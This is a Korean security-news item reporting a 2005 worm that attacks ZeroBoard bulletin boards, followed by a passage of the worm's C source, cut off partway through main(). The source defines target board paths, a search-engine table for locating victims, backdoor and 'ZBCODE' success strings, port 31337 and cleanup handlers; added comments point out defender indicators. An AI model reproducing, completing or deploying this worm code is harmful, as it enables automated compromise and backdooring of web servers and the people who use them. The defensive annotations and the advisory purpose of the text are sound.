국내에서 주로 사용되고 있는 게시판 서비스인 제로보드 게시판 서비스를 공격하는 익스플로잇 바이러스가 발견되었다.
2005년 5월 5일부터 해당 코드가 여러 외국 사이트에 공개되었으며 제로보드는 PHP와 MySQL이 지원되는 서버에 설치하여 사용하는 국산 게시판이다.
코드내부에는 아래와 같은 문자열이 포함되어 있고, 제로보드의 취약점을 공격하는 익스플로잇과 검색엔진을 이용한 확산방법을 사용한다.
ZeroBoard -1day INE w0rm
확산에 사용되는 검색엔진은 네이트닷컴, 구글코리아, 야후코리아, 네이트닷컴, 라이코스, 알타비스타 코리아 등이다.
//search.nate.com
//www.google.co.kr
//kr.search.yahoo.com
//search.lycos.com
//kr.altavista.com
제작자는 한국인으로 추정되며 검색엔진을 통해서 아래 형식의 제로보드 게시판을 검색하므로 아래와 같은 경로를 쓰지 않는것이 좋고, 최신버전을 항상 유지하는것이 좋다고 밝혔다.
"/zboard/zboard.php"
"/zb41/zboard.php"
"/bbs/zboard.php"
"/zb/zboard.php"
"/zb40/zboard.php"
"/board/zboard.php"
"zboard.php"
"zboard.ph"
--------------------------------------------------------------------------------
/*
** ZeroBoard -1day INE w0rm
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef __sun__
#include
#endif /* __SunOS__ */
/* Debug switch: defined and immediately undefined, so the DEBUG_ING
 * fprintf blocks in this file are compiled out. */
#define DEBUG_ING
#undef DEBUG_ING
/* Paths of three working files, relative to the current directory.
 * sf_exit() unlinks all three; what is written to them is outside this
 * excerpt.
 * NOTE(review): the ".core" suffix presumably makes them resemble crash
 * dumps -- unconfirmed. Either way the names are usable as host-side file
 * indicators when examining a suspect machine. */
#define TMP_FILE "./tmp.core"
#define CMD_FILE "./cmd.core"
#define PRC_FILE "./proc.core"
/* 0 and 1; main() uses them as initial values for its counters and flags. */
#define SCS (0)
#define MIN (1)
/* Default network interface name per build platform (Linux, FreeBSD,
 * Solaris). No fallback is defined for any other platform, and the use of
 * DEF_ETH is outside this excerpt. */
#ifdef __linux__
#define DEF_ETH "eth0"
#else
#ifdef __FreeBSD__
#define DEF_ETH "ed0"
#else
#ifdef __sun__
#define DEF_ETH "hme0"
#endif
#endif
#endif
/* Buffer sizes in bytes. main() sizes its stack arrays with these; two of
 * those arrays are MAX_BUF (65535 bytes) each. */
#define MAX_BUF (0x0000ffff)
#define FIR_BUF (0x00000800)
#define SEC_BUF (0x00000400)
#define THR_BUF (0x00000200)
#define MIN_BUF (0x00000100)
/* Vendor domain string; where it is used is outside this excerpt. */
#define VENDOR "nzeo.com"
// search rule
/* Board URL fragments. Each one is paired with an FD_PATH_* entry in
 * __tg_rule_va. The write-up above the listing describes them as the board
 * paths looked up through search engines. */
#define FD_RULE_0 "/zboard/zboard.php"
#define FD_RULE_1 "/zb41/zboard.php"
#define FD_RULE_2 "/bbs/zboard.php"
#define FD_RULE_3 "/zb/zboard.php"
#define FD_RULE_4 "/zb40/zboard.php"
#define FD_RULE_5 "/board/zboard.php"
#define FD_RULE_6 "zboard.php"
#define FD_RULE_7 "zboard.ph"
// pattern
/* Paths under each board's skin/zero_vote directory, paired with the rules
 * above. How they are requested is outside this excerpt. For defenders:
 * hits on skin/zero_vote/login.php in web-server access logs are worth
 * reviewing on hosts that run this board. */
#define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
#define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
#define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
#define FD_PATH_3 "/zb/skin/zero_vote/login.php"
#define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
#define FD_PATH_5 "/board/skin/zero_vote/login.php"
#define FD_PATH_6 "/skin/zero_vote/login.php"
/* Status strings. Presumably compared against responses -- the comparison
 * is outside this excerpt. The MAKE_ and DELT_ strings name the creation and
 * deletion of a "BACKDOOR" and a "ZBCODE" artefact. */
#define RESULT_OK "200 OK"
#define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
#define MAKE_STR2 "ZBCODE MAKE SUCCESS"
#define DELT_STR1 "BACKDOOR DELETE SUCCESS"
#define DELT_STR2 "ZBCODE DELETE SUCCESS"
/* main() initialises def_port to DEF_PORT and port to CONN_PORT.
 * NOTE(review): 31337 is presumably tied to the backdoor strings above --
 * confirm against the rest of the file. An unexpected listener on that port
 * is worth checking on an affected host. */
#define DEF_PORT (31337)
#define CONN_PORT (80)
/* NOTE(review): presumably a timeout in seconds for the SIGALRM path that
 * t_kill() handles -- the alarm call is outside this excerpt. */
#define DEF_TIME (20)
/* Forward declarations. Only t_kill() and sf_exit() are defined within this
 * excerpt; the other bodies are elsewhere in the file, so nothing is stated
 * here about their behaviour. The empty parameter lists are old-style
 * declarations that give the compiler no argument checking. */
int set_sock(char *sc_gt_host,int port,int type);
void re_connt_lm(int st_sock_va,int type);
int proc_r();
void t_kill();
void sf_exit();
int g_ip(char *ip);
int make_cmd_file();
int filter_f(char *test_bf,int tnum);
/* Single global socket descriptor. The handlers t_kill() and sf_exit() both
 * close it; t_kill() additionally resets it to -1. */
int sock;
/* One target rule: pairs a board URL fragment with an associated path.
 * Instances live in __tg_rule_va. */
struct tg_rl
{
int r_num; /* row index within the table */
char *r_str; /* FD_RULE_* fragment; NULL in the terminator row */
char *url_str; /* FD_PATH_* path; NULL in the terminator row */
};
/* NOTE(review): TARGET_NUM is 7 and SEARCH_NUM is 4, while the rule table
 * holds rows 0..7 and the search table rows 0..4 before their NULL
 * terminators. They therefore look like highest valid indexes rather than
 * element counts -- confirm against the bounds checks in main(). */
#define TARGET_NUM (7)
#define SEARCH_NUM (4)
/* Rule table, terminated by a row whose strings are NULL. Rows 6 and 7 both
 * map to FD_PATH_6. Note that an identifier starting with a double
 * underscore is reserved for the implementation in C. */
struct tg_rl __tg_rule_va[]=
{
{0,FD_RULE_0,FD_PATH_0},
{1,FD_RULE_1,FD_PATH_1},
{2,FD_RULE_2,FD_PATH_2},
{3,FD_RULE_3,FD_PATH_3},
{4,FD_RULE_4,FD_PATH_4},
{5,FD_RULE_5,FD_PATH_5},
{6,FD_RULE_6,FD_PATH_6},
{7,FD_RULE_7,FD_PATH_6},
{8,NULL,NULL} /* terminator */
};
/* One search-engine entry. Instances live in search_va. The u_char pointer
 * fields are initialised there from plain string literals, which compilers
 * report as a pointer-signedness mismatch. */
struct search_rule
{
int num; /* row index within the table */
u_char *url; /* search-engine host name; NULL in the terminator row */
int maxnum; /* presumably the upper bound for result paging -- TODO confirm */
int defnum; /* presumably the paging step -- TODO confirm */
u_char *http_head; /* "//" in every populated row; its use is outside this excerpt */
};
/* Search-engine table, terminated by a row whose strings are NULL.
 * Row 0 is www.google.com, whereas the write-up above the listing names
 * www.google.co.kr. For defenders, bursts of automated queries from one host
 * to these search hosts are a network-side signal worth correlating with the
 * file and path indicators defined earlier in the file. */
struct search_rule search_va[]=
{
{0,"www.google.com",990,10,"//"},
{1,"kr.search.yahoo.com",990,15,"//"},
{2,"search.nate.com",480,10,"//"},
{3,"search.lycos.com",990,10,"//"},
{4,"kr.altavista.com",1000,10,"//"},
{5,NULL,0,0,NULL} /* terminator */
};
/*
 * t_kill - drop the current connection.
 *
 * Closes the global socket, marks it invalid with -1 and restores the
 * default SIGALRM disposition. It appears to be the alarm (timeout) handler;
 * the place where it is registered is outside this excerpt.
 *
 * NOTE(review): the debug build calls fprintf(), which is not
 * async-signal-safe if this really runs as a signal handler.
 */
void t_kill()
{
#ifdef DEBUG_ING
    fprintf(stdout,"time outn");
#endif
    /* Order matters: release the descriptor before overwriting the global. */
    close(sock);
    sock = -1;

    signal(SIGALRM, SIG_DFL);
}
/*
 * sf_exit - tear the process down and remove its working files.
 *
 * main() installs this for SIGINT and SIGTSTP. It closes the global socket,
 * sends signal 9 to the process id reported by proc_r(), unlinks TMP_FILE,
 * CMD_FILE and PRC_FILE, and exits with status -1.
 *
 * Forensic note: after this handler has run, none of the three working files
 * remain on disk, so finding them implies the process ended some other way
 * or is still running.
 *
 * NOTE(review): proc_r() is defined elsewhere and its result reaches kill()
 * unchecked. If it can return 0 or -1, kill() would address a process group
 * or every process the user may signal -- confirm before running a sample,
 * even in a sandbox. exit() is also not async-signal-safe.
 */
void sf_exit()
{
    const char *work_files[] = { TMP_FILE, CMD_FILE, PRC_FILE };
    int helper_pid;
    int idx;

#ifdef DEBUG_ING
    fprintf(stdout,"safe exitn");
#endif
    close(sock);

    helper_pid = (int)proc_r();
    kill(helper_pid, 9);

    /* Same three files, same order as the individual unlink calls. */
    for (idx = 0; idx < (int)(sizeof work_files / sizeof work_files[0]); idx++) {
        unlink(work_files[idx]);
    }

    exit(-1);
}
int main(int argc,char *argv[])
{
FILE *fp;
int tnum=(SCS);
int chk=(SCS);
int gogo=(SCS);
int whgl=(SCS);
int qnum=(SCS);
int tgrl_sl=(MIN);
int _conn_num=(SCS);
int port=(CONN_PORT);
int def_port=(DEF_PORT);
int sc_gt_sock;
int host_chk=(SCS);
u_char *gg_ptr=NULL;
u_char *t_ptr=NULL;
u_char __zr_bf[(MAX_BUF)];
u_char *port_ptr=NULL;
char pkt[(FIR_BUF)];
char host[(SEC_BUF)];
char url[(SEC_BUF)];
char test_bf[(MAX_BUF)];
char req_t_bf[(THR_BUF)];
char ip[(MIN_BUF)];
char atk_code[(MIN_BUF)];
signal(SIGINT,sf_exit);
signal(SIGTSTP,sf_exit);
while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
{
extern char *optarg;
switch(whgl)
{
case 'S':
case 's':
tnum=atoi(optarg);
if(SEARCH_NUM